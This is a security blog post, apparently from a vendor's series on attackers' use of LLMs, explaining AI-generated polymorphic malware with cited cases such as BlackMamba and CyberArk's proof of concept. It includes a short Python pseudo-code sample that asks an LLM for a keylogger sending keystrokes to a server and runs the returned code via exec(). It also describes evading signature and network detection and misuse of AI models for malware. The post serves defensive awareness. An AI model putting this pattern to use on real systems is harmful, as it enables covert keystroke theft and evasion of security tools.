We’re losing”Š”, “Šbut it can’t get any worse, right?

LLMs are being used in many ways by attackers; how blind are you? We’re spending hundreds of billions and losing trillions in cybersecurity. The industry structure is partially to blame. AI is here to help, right? Well, as others have pointed out, AI is being adopted more rapidly by attackers than it is by defenders. With that in mind, I decided to dive into the details. How are attackers using our favorite friends, the LLM? And how is AI enabling more “living on the land” attacks that our existing systems are unable to discern?

In this series, I dive into 5 vectors being enhanced by LLMs. Each post explores why the technique is more effective now and refers to industry and academic research. I also include code examples to make it very concrete for practitioners. This blog examines the first vector: AI-Generated Polymorphic Malware. Subsequent posts will cover Obfuscated Command & Control Channels, AI-Recrafted “Frankenstein” Attacks, and AI-Enhanced Social Engineering & Phishing, before concluding the series by examining how these are all used for sophisticated “living on the land” TTPs and, on an optimistic note, briefly touching upon the use of Collective Defense for Deep Learning. .

Part 1: Polymorphic Malware”Š”, “ŠShape-Shifting Attacks

“Polymorphic malware” refers to malicious code that changes its form to evade detection. Historically, malware authors achieved this through packers, obfuscators, or self-modifying code. Now, LLMs help attackers improve polymorphism”Š”, “Šautomating the generation of malware variants and even producing malicious payloads on the fly. As explained in this darkreading article, AI models can create malware that “contains no malicious code at all” until runtime, making it extremely hard to detect with signature-based or static analysis tools.

AI-Driven Polymorphism Explained

LLMs enable malware to evolve in real time, defeating security solutions that rely on known patterns. For example, researchers found OpenAI’s ChatGPT could write “highly advanced malware that contains no malicious code at all”, instead generating malicious functionality dynamically when needed”‹. This means a malware file might appear benign to antivirus scanners and other signature-based approaches, only fetching or creating harmful code via an AI API at runtime. Security firm CyberArk demonstrated exactly this: using ChatGPT’s API from within malware to pull injection code and mutate it on demand“‹. The result is cheap, easy “ChatGPT polymorphic malware” that poses “significant challenges for security professionals.”“‹ Each time the malware runs, the code it uses is freshly synthesized and unique, bypassing traditional signature detection. Migo Kedem (follow this link for their LinkedIn), formerly of SentinelOne and now at CrowdStrike, in an excellent blog introduces a proof-of-concept called BlackMamba that anticipated the use of this approach. BlackMamba is a polymorphic keylogger that uses a benign program to reach out to a cloud AI service, in this case OpenAI, at runtime; it then retrieves malicious code, and executes it in-memory”‹. By pulling payloads from a trusted AI provider instead of a suspicious server, BlackMamba’s network traffic looks normal”Š”, “Šas if the infected system is simply querying an AI model. And because the AI generates a new variant of the payload each time, no two infections look alike on disk”‹. BlackMamba was designed to defeat two approaches: Static signatures: Since the malware’s code is synthesized dynamically and differently for each run, file hashes and byte signatures are never the same twice. One BlackMamba sample might request the AI to produce a PowerShell snippet for keylogging, and another sample might get equivalent C# code”Š”, “Šsame behavior, completely different code. Network detection: Instead of contacting an obvious command-and-control (C2) server, the malware talks to an API on openai.com”Š”, “Ša domain unlikely to be blocked and generally considered safe; note this could be considered an example of living on the land in that they are really just using OpenAI. The AI responses don’t trip typical C2 pattern-matching since they resemble normal API traffic and the conten returned from OpenAIt looks like innocuous text until executed. Industry experts have taken note of this trend. In early 2023, DarkReading warned that “ChatGPT could usher in a new dangerous wave of polymorphic malware”“‹

Evidence of Polymorphic Malware

Concrete examples underscore why this technique is important: CyberArk’s Polymorphic Malware POC: CyberArk researchers used ChatGPT to generate malware that could morph itself”‹. The AI produced code for each attack stage, creating injection code and continually mutating it”‹. This experiment showed that even less-skilled threat actors could leverage an LLM to produce malware that evades EDR and AV. ChatGPT-Based Mutation Services: By mid-2023, underground forums began discussing and advertising custom AI models like WormGPT and FraudGPT fine-tuned for malicious tasks. These models allow attackers to bypass the ethical filters of ChatGPT and freely generate malware and malicious macros. Mandiant reported that North Korea’s APT43 even purchased access to WormGPT in 2023″‹, indicating serious interest in AI-assisted malware development by nation-states. This Github repository on the use of AI by Attackers started by Rachel James (follow link to their LinkedIn) is one of the best I have found in tracking this emerging domain. Please add any pointers you’ve found below.

Code Example: Malware That Writes Itself Using an LLM

To illustrate how an attacker might implement this sort of polymorphic behavior, consider this Python pseudo-code. As you can see, the snippet uses an AI model to generate a malicious function at runtime and executes it: import base64 import openai # hypothetical library for AI API # 1. Define a prompt to request malicious code (e.g., a keylogger) from the LLM prompt = ( “You are a helpful coding assistant. Please provide a Python function called “ “‘steal_keystrokes’ that reads pressed keys and sends them as base64 to a server. “ “Do not include any explanations, just provide the code.” ) # 2. Call the LLM API to generate the code response = openai.Completion.create(model=”LLM-of-choice”, prompt=prompt) malicious_code = response[‘choices’][0][‘text’] # 3. For added polymorphism, mutate the code slightly (e.g., random variable names) # (In practice, we could prompt the LLM again to obfuscate or rename variables) # 4. Execute the generated code dynamically exec(malicious_code) # Now the steal_keystrokes function is defined in memory and can be invoked, # accomplishing the malicious behavior without ever writing static malicious code to disk. steal_keystrokes() As you can see: Step 1, the malware crafts a prompt asking the LLM for a specific malicious function Step 2, it gets back code, for example a function that uses keyboard hooks. Step 3, it executes that code within its process. Notice that the malicious logic (the steal_keystrokes function) never existed in the source code”Š”, “Šit was created at runtime. The attacker can tweak the prompt or use a slightly different mode each time it runs, yielding a variation in the code such as different function names, logic structure, encoding, and so on. This dynamic code generation defeats file-based detection and makes each instance unique. Such polymorphic techniques can also be combined with encryption or encoding. For example, the malware could ask the LLM to return the payload in base64, as shown above, or another encoding, then decode and execute”Š”, “Šfurther obscuring the content from scanners.

Why Traditional Security Struggles to Detect It

Conventional cybersecurity defenses are challenged on multiple fronts by AI-generated polymorphic malware: Signature Evasion: Signatures such as known byte patterns and YARA rules are ineffective when each malware instance is one-of-a-kind. Even heuristic rules looking for certain code structures can be fooled because an AI can implement the same behavior in novel ways. As one report put it, “new variants”¦maintain the same behavior”¦while almost always having a much lower malicious score” in scanners”‹.
thehackernews.com Behavioral Detection Limits: Behavior-based monitoring, which is typically looking for actions like file encryption, suspicious process injection and so on, is still useful, however sophisticated AI malware might perform those actions in bursts or embed them in normal-looking processes. What is more, if the AI code is fetched just-in-time, by the time the malicious action occurs, it might be too late for preventative controls to react. Living-off-the-Land: Many AI-assisted attacks use legitimate tools and channels”Š”, “Šsuch as using the OpenAI API in our example. This blends malicious actions with normal operations. Security tools that allow or ignore trusted processes”Š”, “Šsuch as a signed binary making an outbound HTTPS connection- will not see anything malicious about the call to an AI service. One key implication”Š”, “Šit is important to be aware of brittle telemetry, which cements your inability to see potentially malicious behavior; be thinking about how to future-proof your telemetry to prepare for approaches that make use of a greater breadth of increased information. We’ve heard engineering teams in larger enterprises considering this when they invest in Snowflake and internal security datalakes and systems to adapt their telemetry such as Cribl or in-house developed equivalents. Volume and Speed: AI can allow a single attacker to quickly generate thousands of malware variants. This overwhelms defenders’ ability to triage alerts or produce counter-signatures, and we have seen behavior that suggests attackers are well aware of how this can overwhelm a SOC. The same approach also degrades traditional machine learning”Š”, “Šby flooding them with variants, attackers can confuse or evade these models”‹. As highlighted in this article (thehackernews.com) Palo Alto’s Unit 42 used an LLM to iteratively rewrite a known malicious script and managed to flip their own ML-based malware classifier verdict from malicious to benign 88% of the time”‹. Traditional defenses, which rely on catching known bad indicators or very overt violations of behavioral patterns, cannot keep up with this AI-fueled mutation cycle.

So”Š”, “Šhow bad can it be?

In a future post, I’ll talk about how and why DeepTempo and other approaches are being adopted to counter polymorphic attacks. In this post”Š”, “Šhopefully I made the threat more real and shared some context we all need to counter this all too real threat. Up Next: In Part 2, I examine how attackers also use LLMs to better connect with Command and Control”Š”, “ŠC2″Š”, “Šsystems. I foreshadowed these techniques a bit in today’s blog. Please stay tuned and provide any feedback you might have on this blog and series. What else would you like to understand better? Am I going to the right level of depth? What am I misunderstanding here or poorly explaining? Thank you for reading and for your suggestions.

We’re losing”Š”, “Šbut it can’t get any worse, right? was originally published in DeepTempo on Medium, where people are continuing the conversation by highlighting and responding to this story.

First seen on securityboulevard.com

Jump to article: securityboulevard.com/2025/03/were-losing-but-it-cant-get-any-worse-right/

We’re losing”Š”, “Šbut it can’t get any worse, right?